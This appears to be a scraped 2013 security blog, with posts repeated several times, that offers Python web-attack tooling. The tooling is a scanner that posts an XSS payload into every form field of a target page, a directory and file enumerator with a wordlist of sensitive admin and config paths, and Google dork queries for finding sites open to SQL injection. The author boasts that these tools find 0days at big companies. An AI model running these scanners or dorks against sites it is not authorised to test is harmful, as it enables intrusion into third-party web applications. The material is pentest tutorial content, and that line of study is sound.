# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separetly with 'payload'.
# enjoy.
import urllib
import urllib2
import re
import sys
import httplib
host = sys.argv[1]
path_file = sys.argv[2]
url = host+':80'
url_file = url+path_file
payload = 'your<xss<code<here' # for example script+alert(2222) - see below ;)
# if you want I have version 'payloads-from-file' too.
print 'Target: ',host
print 'Vuln file: ',path_file
print 'Full URL to attack:' ,url_file
print
# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
get_connect = urllib.urlopen('http://'+url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ',status
# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"",get_response)
#############################################################
# hm ;] one idea to test right now. ;D
poc = open('poc_file_for_POST_xss.html','w')
#############################################################
# func to send POST to target url+found parameter
def do_post_now(url):
params = urllib.urlencode ( { results[i] : payload } )
headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
connect = httplib.HTTPConnection(url)
connect.request('POST', path_file, params, headers)
response = connect.getresponse()
print response.status, response.reason # 200 OK?
data = response.read()
connect.close() # end of test this parameter at this URL
y=0
line = data.find('2222')
if line != -1:
print '\t[+- ( POST XSS alert! ) -+]'
print '\t [+] Found POST XSS in line:' ,line
print data[y]
print poc.writelines(data)
# poc.close() # write&save simple p0c file. ;7
# lookout here, because in some cases .close() method will generate an error.
# that's why it's #commented here.
y=y+1
# end of do_post_now(url)
# ---
# MAIN:
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
sys.exit(1)
else:
# if result found:
if (len(results)>0):
print '-------------------------------------------------------------'
print 'Got some results :) Now we can try to exploit parameters.\n'
i = 0 # next in list
while i < len(results):
print 'Found param called: ',results[i]
print 'Do POST now, for URL: ', url, ' with param: ', results[i]
# here we'll create a POST for found parameter
do_post_now(url)
# end of this POST for this parameter
# and next line:
i=i+1
# end of while i loop
# EOF.
# ----
Interesting thing here is that you will find 0days vulnerabilities at big companies.
Trust me. ;)
And - as always - feedback is welcome.
(* full code you will find also here.)
Enjoy! ;)
webapp scanner. This part (called 'module') can be used to figureout where in tested page we
will have a possibility of XSS vulnerablity (via HTTP POST).
It could be a good exercise to connect all of those 'modules' to build 'one code'
to test all vulnerabilities.
To start, create a file named try_POST_xss.py. (Like before, we will need chmod u+x for this file.)
Source code you can find below:
#!/usr/bin/env python
# ----
# try_POST_xss.py
# ----
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separetly with 'payload'.
# enjoy.
import urllib
import urllib2
import re
import sys
import httplib
host = sys.argv[1]
path_file = sys.argv[2]
url = host+':80'
url_file = url+path_file
payload = 'your<xss<code<here' # for example script+alert(2222) - see below ;)
# if you want I have version 'payloads-from-file' too.
print 'Target: ',host
print 'Vuln file: ',path_file
print 'Full URL to attack:' ,url_file
# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
get_connect = urllib.urlopen('http://'+url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ',status
# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"",get_response)
#############################################################
# hm ;] one idea to test right now. ;D
poc = open('poc_file_for_POST_xss.html','w')
#############################################################
# func to send POST to target url+found parameter
def do_post_now(url):
params = urllib.urlencode ( { results[i] : payload } )
headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
connect = httplib.HTTPConnection(url)
connect.request('POST', path_file, params, headers)
response = connect.getresponse()
print response.status, response.reason # 200 OK?
data = response.read()
connect.close() # end of test this parameter at this URL
y=0
line = data.find('2222')
if line != -1:
print '\t[+- ( POST XSS alert! ) -+]'
print '\t [+] Found POST XSS in line:' ,line
print data[y]
print poc.writelines(data)
# poc.close() # write&save simple p0c file. ;7
# lookout here, because in some cases .close() method will generate an error.
# that's why it's #commented here.
y=y+1
# end of do_post_now(url)
# ---
# MAIN:
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
sys.exit(1)
else:
# if result found:
if (len(results)>0):
print '-------------------------------------------------------------'
print 'Got some results :) Now we can try to exploit parameters.\n'
i = 0 # next in list
while i < len(results):
print 'Found param called: ',results[i]
print 'Do POST now, for URL: ', url, ' with param: ', results[i]
# here we'll create a POST for found parameter
do_post_now(url)
# end of this POST for this parameter
# and next line:
i=i+1
# end of while i loop
# EOF.
# ----
Interesting thing here is that you will find 0days vulnerabilities at big companies.
Trust me. ;)
And - as always - feedback is welcome.
(* full code you will find also here.)
Enjoy! ;)
[EN] Modules in your own webscanner - find dirs and files
Durning the projects often the question is 'what tools we use'.
It would be difficult to 'present' the entire list of tools available in distros such as BackTrack,
but sometimes also hard to believe that we can use 'our own tools'.
Today, the idea taken directly from the popular DirBuster (available here). If you don't know it,
take a few minutes to check it out against your server(s).
Sometimes, when we're doing tests 'from shell' (or from console, you name it), we would like to use 'lighter' tool, than Java-based DirBuster.
Python can be the answer here.
With a few lines of code, we can offer a simple solution. A small program written in Python,
reads 'line by line' filenames and/or dir-names listed in the TXT-list-file and after that it
will present status code (of HTTP response) for each file/dirname.
In the directory where you'll put this python-code, let's create the file with a list of the interesting location(s) on a remote server. Sample list could look like this:
/config.php
/config_inc.php
/config/
/configuration/
/configuration.php
/doc/
/api/
/cache/
/template/
/language/
/media/
/modules/
/plugins/
/install/
/users/
/admincp/
/modcp/
/archive/
/archives/
/sitemap.xml
/ckeditor.php
/FCKeditor/editor/filemanager/browser/default/browser.html
/editor/filemanager/browser/default/browser.html
/fckeditor/editor/css/
/wp-admin/
/wp-content/
/wp-includes/
/index.aspx
/manual/
/server-status
/phpinfo.php
/pi.php
/phpMyAdmin/
/phpmyadmin/
/pma/
/panel/
/login/
/register
/contac
Of course a good choice is to use your own list (but for start you can try 'lists' from DirBuster / fuzzdb project).
Save this list to 'dirsToCheck.txt' file. This is of course a sample list of 'most interesting (us)' locations on a remote test-server. Finding those files/dirs can be significant (from 'webapp-test-point-of-view') because their could be used in the future to abuse, or obtaining information that will be useful durning another steps in pentest.
How do I take advantage of it now?
The program, which is below, does the following:
* the previously prepared TXT-file (with names and locations of directories and files), reads a line by line 'name-location'
* those 'names' (locations) will be used to build a full-URL address to remote hosts (as sys.argv[1])
* full-URL now is checking by HTTP GET (by urllib)
* status code (HTTP response) is the answer from each test (for each 'location')
Code is here:
#!/usr/bin/env python
# ---
# try_dirs.py
# this 'module' will check if there is a file/dir at remote host.
# files/dirs can be edited (you will find it at dirsToCheck.txt file).
# ---
# version : 2 @ 19.03.2013
#
import urllib
import sys
# defines:
url = sys.argv[1]
dirsToCheck = open('dirsToCheck.txt','r')
try_dir = dirsToCheck.readlines()
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/')
sys.exit(1)
else:
print '--------------------------------------------------------------'
print 'Try enumerate files/dirs at this URL: ',url
print '--------------------------------------------------------------'
i=0
for line in try_dir:
full_url_to_check = url+line
# print full_url_to_check
try_page = urllib.urlopen(full_url_to_check)
i=i+1
if try_page.getcode() == 200:
print 'Found location: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() == 401:
print 'Found location: ', line
print 'Seems to be authorized only: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() >= 500:
print 'Found server-side problem: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() == 403:
print 'Found but you have no permissions to access: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
Now you can re-edit this code to add for example 404-code (what can be useful durning information gathering steps, because sometimes 404-pages responsing with accurate name and server version).
At this stage, all (the results of the program) can be written by a *nix-based 'redirect to a file' using the '> name.txt'.
Another method is to create a larger 'program' and to establish methods of saving it to 'log-file' (eg using. writelines() to generate a simple report in a more elegant way.
How to run it you will find at code. At console you can use
$chmod u+x check_dirs.py
and next:
$ ./check_dirs.py http://our-server.com (with > filelog.txt if you want)
Sample output will look like this:
$ ./check_dirs-2.py http://www.xxx.xx
--------------------------------------------------------------
Try enumerate files/dirs at this URL: http://www.xxx.xx
--------------------------------------------------------------
Found location: /plugins/
Status: 200
------------------------------------------
Found location: /sitemap.xml
Status: 200
------------------------------------------
Found but you have no permissions to access: /wp-admin/
Status: 403
------------------------------------------
Found location: /wp-content/
Status: 200
------------------------------------------
Found but you have no permissions to access: /server-status
Status: 403
------------------------------------------
(...)
(* full code you will find here.)
Enjoy ;)
It would be difficult to 'present' the entire list of tools available in distros such as BackTrack,
but sometimes also hard to believe that we can use 'our own tools'.
Today, the idea taken directly from the popular DirBuster (available here). If you don't know it,
take a few minutes to check it out against your server(s).
Sometimes, when we're doing tests 'from shell' (or from console, you name it), we would like to use 'lighter' tool, than Java-based DirBuster.
Python can be the answer here.
With a few lines of code, we can offer a simple solution. A small program written in Python,
reads 'line by line' filenames and/or dir-names listed in the TXT-list-file and after that it
will present status code (of HTTP response) for each file/dirname.
In the directory where you'll put this python-code, let's create the file with a list of the interesting location(s) on a remote server. Sample list could look like this:
/config.php
/config_inc.php
/config/
/configuration/
/configuration.php
/doc/
/api/
/cache/
/template/
/language/
/media/
/modules/
/plugins/
/install/
/users/
/admincp/
/modcp/
/archive/
/archives/
/sitemap.xml
/ckeditor.php
/FCKeditor/editor/filemanager/browser/default/browser.html
/editor/filemanager/browser/default/browser.html
/fckeditor/editor/css/
/wp-admin/
/wp-content/
/wp-includes/
/index.aspx
/manual/
/server-status
/phpinfo.php
/pi.php
/phpMyAdmin/
/phpmyadmin/
/pma/
/panel/
/login/
/register
/contac
Of course a good choice is to use your own list (but for start you can try 'lists' from DirBuster / fuzzdb project).
Save this list to 'dirsToCheck.txt' file. This is of course a sample list of 'most interesting (us)' locations on a remote test-server. Finding those files/dirs can be significant (from 'webapp-test-point-of-view') because their could be used in the future to abuse, or obtaining information that will be useful durning another steps in pentest.
How do I take advantage of it now?
The program, which is below, does the following:
* the previously prepared TXT-file (with names and locations of directories and files), reads a line by line 'name-location'
* those 'names' (locations) will be used to build a full-URL address to remote hosts (as sys.argv[1])
* full-URL now is checking by HTTP GET (by urllib)
* status code (HTTP response) is the answer from each test (for each 'location')
Code is here:
#!/usr/bin/env python
# ---
# try_dirs.py
# this 'module' will check if there is a file/dir at remote host.
# files/dirs can be edited (you will find it at dirsToCheck.txt file).
# ---
# version : 2 @ 19.03.2013
#
import urllib
import sys
# defines:
url = sys.argv[1]
dirsToCheck = open('dirsToCheck.txt','r')
try_dir = dirsToCheck.readlines()
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/')
sys.exit(1)
else:
print '--------------------------------------------------------------'
print 'Try enumerate files/dirs at this URL: ',url
print '--------------------------------------------------------------'
i=0
for line in try_dir:
full_url_to_check = url+line
# print full_url_to_check
try_page = urllib.urlopen(full_url_to_check)
i=i+1
if try_page.getcode() == 200:
print 'Found location: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() == 401:
print 'Found location: ', line
print 'Seems to be authorized only: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() >= 500:
print 'Found server-side problem: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
elif try_page.getcode() == 403:
print 'Found but you have no permissions to access: ', line
print 'Status: ', try_page.getcode()
print '------------------------------------------'
Now you can re-edit this code to add for example 404-code (what can be useful durning information gathering steps, because sometimes 404-pages responsing with accurate name and server version).
At this stage, all (the results of the program) can be written by a *nix-based 'redirect to a file' using the '> name.txt'.
Another method is to create a larger 'program' and to establish methods of saving it to 'log-file' (eg using. writelines() to generate a simple report in a more elegant way.
How to run it you will find at code. At console you can use
$chmod u+x check_dirs.py
and next:
$ ./check_dirs.py http://our-server.com (with > filelog.txt if you want)
Sample output will look like this:
$ ./check_dirs-2.py http://www.xxx.xx
--------------------------------------------------------------
Try enumerate files/dirs at this URL: http://www.xxx.xx
--------------------------------------------------------------
Found location: /plugins/
Status: 200
------------------------------------------
Found location: /sitemap.xml
Status: 200
------------------------------------------
Found but you have no permissions to access: /wp-admin/
Status: 403
------------------------------------------
Found location: /wp-content/
Status: 200
------------------------------------------
Found but you have no permissions to access: /server-status
Status: 403
------------------------------------------
(...)
(* full code you will find here.)
Enjoy ;)
Wednesday, 13 March 2013
[EN] Modules in your own web scanner - #1
Soon... ;]
As soon as possible you will find here also:
- xss over GET 'test module'
- xss over POST 'test module'
- directory traversal/LFI 'test module' - (@10/02)
- sql injection 'test module' - (@19/03)*
- dir-finder 'module' - (@10/02)
- (... still in progress ;])
- and some information gathering 'module'
'to do' is of course GUI version, but who knows, maybe for now I will stay with console-based version.
Anyway... *After few minutes of using 'sqli-test' module I found an '0day vulnerability' in some 'random-checked' Joomla module (sqli injection vuln), so it's also usefull for searching this kind of bugs.*
*20.03.2013 - update*
As you can see, few modules are here today. Let me know about any feedback/ideas/questions.
Thanks!
o/
As soon as possible you will find here also:
- xss over GET 'test module'
- xss over POST 'test module'
- directory traversal/LFI 'test module' - (@10/02)
- sql injection 'test module' - (@19/03)*
- dir-finder 'module' - (@10/02)
- (... still in progress ;])
- and some information gathering 'module'
'to do' is of course GUI version, but who knows, maybe for now I will stay with console-based version.
Anyway... *After few minutes of using 'sqli-test' module I found an '0day vulnerability' in some 'random-checked' Joomla module (sqli injection vuln), so it's also usefull for searching this kind of bugs.*
*20.03.2013 - update*
As you can see, few modules are here today. Let me know about any feedback/ideas/questions.
Thanks!
o/
Tuesday, 5 March 2013
[EN] Why is good to turn off error display
this is a foobar-temporary-name, not for some tutorial 'how to 1,2,3', but
for tutorial of 'how to think about possibilities of vulnerability'.
Questions?
No? thanks. Go.
Trick 1. What is the purpose?
Answer: Cash. Hacktivism. Stupidity.
Trick 2. Most 'common' ways of hacking?
In my opinion - the most dangerous bug, is input-vulnerabilities kind of bugs.
(code/php injections, others rce - I'm calling it all: 'rce' ;))
So 'most dangerous' and 'most simple to re-script'.
Trick 3. No sample, just idea.
'What if' an attacker will go to google.com search bar, and few ideas about
how to connect parameters of 'google-hacks', to find _really_ useful things, maybe will
change your site to one of those already 'h4ck3d'?
hm...
ok. ;]
simple arsenal: 5 parameters:
(param:example)#
site:com # find sites.COM
site:com -site:com.br # find sites.COM without .com.br
site:org intext:findme # find all sites.ORG with 'findme' word
ext:php # find all php type of files (extensions)
intitle:motel # find all pages contains 'title' with motel word
Great.
If you have some knowledge about writting php pages,
you can get few simple ideas right now.
As a coder you saw 'few times' some error-messages,
for example 'Error in line...' whatever.
Remember those errors from MySQL? ;>
Maybe this simple example will refresh your memory:
site:r0x intext:"SQL.Syntax" ext:php intext:error
ok not bad, but not so good also. ;)
Upgrade:
intext:"SQL.Syntax" ext:php intext:error inurl:".php?*=2"site:stillr0x
this google-dork actually gives you 'few' vulnerable to sqlinjection attacks
sites, so b patient and think what you're doing. if you're doing anything with this ideas,
do NOT do bad things and remember to test it only against your sites.
Remember. ;)
More? here.
o/
for tutorial of 'how to think about possibilities of vulnerability'.
Questions?
No? thanks. Go.
Trick 1. What is the purpose?
Answer: Cash. Hacktivism. Stupidity.
Trick 2. Most 'common' ways of hacking?
In my opinion - the most dangerous bug, is input-vulnerabilities kind of bugs.
(code/php injections, others rce - I'm calling it all: 'rce' ;))
So 'most dangerous' and 'most simple to re-script'.
Trick 3. No sample, just idea.
'What if' an attacker will go to google.com search bar, and few ideas about
how to connect parameters of 'google-hacks', to find _really_ useful things, maybe will
change your site to one of those already 'h4ck3d'?
hm...
ok. ;]
simple arsenal: 5 parameters:
(param:example)#
site:com # find sites.COM
site:com -site:com.br # find sites.COM without .com.br
site:org intext:findme # find all sites.ORG with 'findme' word
ext:php # find all php type of files (extensions)
intitle:motel # find all pages contains 'title' with motel word
Great.
If you have some knowledge about writting php pages,
you can get few simple ideas right now.
As a coder you saw 'few times' some error-messages,
for example 'Error in line...' whatever.
Remember those errors from MySQL? ;>
Maybe this simple example will refresh your memory:
site:r0x intext:"SQL.Syntax" ext:php intext:error
ok not bad, but not so good also. ;)
Upgrade:
intext:"SQL.Syntax" ext:php intext:error inurl:".php?*=2"site:stillr0x
this google-dork actually gives you 'few' vulnerable to sqlinjection attacks
sites, so b patient and think what you're doing. if you're doing anything with this ideas,
do NOT do bad things and remember to test it only against your sites.
Remember. ;)
More? here.
o/
[EN] Hello, I'm looking for a job.
After 4 months of recrutation to RBS... I'm not too good to work there.
Practical knowledge is worst than certificates in resume.
Yeah, yeah, but one question:
Malware or 14years hacker from Japan - has no certs too, but they can still hack and down your company.
Think twice about ignoratn HR's.
"Hey Shimomura! Your kung-fu the best!"
Practical knowledge is worst than certificates in resume.
Yeah, yeah, but one question:
Malware or 14years hacker from Japan - has no certs too, but they can still hack and down your company.
Think twice about ignoratn HR's.
"Hey Shimomura! Your kung-fu the best!"
Subscribe to:
Posts (Atom)